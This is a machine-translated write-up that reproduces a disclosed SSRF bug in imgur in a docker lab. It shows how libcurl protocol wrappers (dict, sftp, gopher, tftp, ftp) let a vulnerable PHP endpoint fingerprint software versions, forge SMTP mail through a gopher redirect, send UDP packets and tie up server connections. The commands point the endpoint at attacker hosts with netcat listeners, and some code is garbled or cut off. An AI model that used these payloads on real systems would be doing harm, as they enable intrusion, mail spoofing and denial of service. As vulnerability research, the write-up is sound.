SSRF libcurl protocol wrappers vulnerability exploitation Analysis
0x00 Overview
A few days ago on hackerone saw an imgur SSRF vulnerability, url: https://imgur.com/vidgif/url? Url = xxx. The parameter url is not restricted. You can access the Intranet address. When the liburl library is used in the request process and liburl is improperly configured, attackers can use multiple libcurl protocols (wrappers) except http (s), such as ftp://xxx.com/file, to allow the server to initiate an ftprequest.
The vulnerability advertiser aesteral provided several methods to use the protocol in the report. After checking the SSRF article before drops, it seems that he didn't specifically introduce protocol wrappers. He just saw this vulnerability report, we tried to build an environment to reproduce and record the process.
0x01 environment setup
First, we need to build a php + nginx environment to simulate the SSRF server Vulnerability environment. Here we choose to build it with docker. The system is Ubuntu14.04. For docker installation, refer to the documentation, we recommend that you replace the apt source of ubuntu with that in China and install it quickly.
After installation, pull the image installed in the php + nginx environment on the docker hub. The repository is abroad, and the speed may be slightly slow.
Docker pull Richard/nginx-php-fpm
Create Code directory/app
Start container (ing port and mounting volume ):
Sudo docker run -- name nginx-p 8084: 80-v/app:/usr/share/nginx/html-d Richard/nginx-php-fpm
Create ssrf. php In the/app directory. Use the resource corresponding to the curl request parameter url in the Code and return it to the client to simulate the SSRF function.
Let's test how to load and access images.
Http: // victim: 8084/ssrf. php? Url = http://download.easyicon.net/png/1199986/96/
Test SSRF, execute nc-l-v 11111 on another machine, and listen to port 11111
Access http: // victim: 8084/ssrf. php? Url = http: // attacker: 11111/
0x02 available protocols
The available protocols provided in the report are:
SSH (scp: //, sftp: //) POP3IMAPSMTPFTPDICTGOPHERTFTP
Let's take a look at the protocols supported by the default libcurl in Ubuntu14.04.
Because docker ubuntu image does not have curl, install apt-get install-y curl
Then run curl-V
[email protected]:/app# curl -Vcurl 7.35.0 (x86_64-pc-linux-gnu) libcurl/7.35.0 OpenSSL/1.0.1f zlib/1.2.8 libidn/1.28 librtmp/2.3Protocols: dict file ftp ftps gopher http https imap imaps ldap ldaps pop3 pop3s rtmp rtsp smtp smtps telnet tftpFeatures: AsynchDNS GSS-Negotiate IDN IPv6 Largefile NTLM NTLM_WB SSL libz TLS-SRP
We can see that
Protocols: dict file ftp ftps gopher http https imap imaps ldap ldaps pop3 pop3s rtmp rtsp smtp smtps telnet tftp
, There is no SSH (scp: //, sftp: //), so the default SSH protocol is not supported, You need to download the source code to reproduce the compilation and installation, you can refer to this article.
0x03 usage
Simple exploitation and Information Leakage
Obtain software version information using SSH and DICT protocols
Sftp (requires curl compilation and installation of libssh Library) Access: http: // victim: 8084/ssrf. php? Url = sftp: // attacker: 11111/
DICT access http: // victim: 8084/ssrf. php? Url = dict: // attacker: 11111/
You can see the software versions used by the Service, libssh2 1.4.3 and libcurl 7.35.0. View CVE
Libssh2 1.4.3 may be affected by CVE-2015-1782
In the report, the software version in the imgur server is libcurl 7.40.0 which may be affected by CVE-2015-3144 and CVE-2015-3237. Our version is libcurl 7.35.0 which is not affected
Use the GOPHER protocol to forge emails
First introduce the GOPHER protocol, from Baidu ~
The Gopher protocol is a protocol used to obtain data from a remote server before the internet is developed. Currently, the Gopher protocol is rarely used. It is almost completely replaced by the HTTP protocol.
Because the GOPHER protocol supports newlines, it can be used to initiate requests similar to TELNET chat-session, such as SMTP and Redis server. As mentioned in the vulnerability report, imgur filters newlines in url parameters. However, imgur server supports 302 redirection. Therefore, you can construct a 302 redirect page to complete attacks based on the GOPHER protocol.
First, test the effect of the GOPHER protocol, and construct the 302 jump page gopher. php
Access http: // victim: 8084/ssrf. php? Url = http: // attacker/gopher. php
Attacker:
Next, I sent an email. I wanted to try it in my domestic mailbox. However, I added a login verification to prevent spam.
The report gives a http://test.smtp.org/website that can be used to test, where the recipient is modified, otherwise it will not be sent successfully
Smtp. php:
', 'RCPT TO: [email protected]', 'DATA', 'Test mail', '.' ); $payload = implode('%0A', $commands); header('Location: gopher://smtp.163.com:25/_'.$payload);?>
Access http: // victim: 8084/ssrf. php? Url = http: // attacker: 8084/smtp. php
Can go to the http://test.smtp.org/log to view the log, my VPS can not connect to the http://test.smtp.org of the 25 port, in exchange for a direct TELNET Simulation
[email protected]:~$ telnet test.smtp.org 25Trying 52.2.168.164...Connected to test.smtp.org.Escape character is '^]'.220 test.smtp.org ESMTP Sendmail 8.16.0.16 ready at Fri, 18 Mar 2016 06:47:04 GMT; see http://test.smtp.org/HELO test.org250 test.smtp.org Hello [xx.xx.xx.xx], pleased to meet youMAIL FROM: <[email protected]>250 2.1.0 <[email protected]>... Sender okRCPT TO: [email protected]250 2.1.5 [email protected].. Recipient okDATA354 Enter mail, end with "." on a line by itselfTest mail.250 2.0.0 u2I6l4QU017644 Message accepted for delivery
Logs
Use the TFTP protocol to send UDP Packets
The server listens to UDP 11111 port nc-v-u-l 11111
Access http: // Victim: 8084/ssrf. php? Url = tftp: // Attacker: 11111/TEST
Attacker:
Can be used to initiate requests to UDP services, such as Memcache and REDIS-UDP
Denial of service
If the request timeout is long, attackers can block the request using the TARPIT of iptables. In addition, the FTP: // of CURL will never time out.
Attacker listens to nc-v-l 11111
Access http: // Victim: 8084/ssrf. php? Url = ftp: // Attacker: 11111/TEST
In the nginx environment, the default timeout time is 1 minute.
Attackers can initiate a large number of requests to consume server resources.
0x04 conclusion
In addition to http (s), some other protocols are available for the Alibaba site when it encounters SSRF. Here we have made a simple analysis and hope to help you ~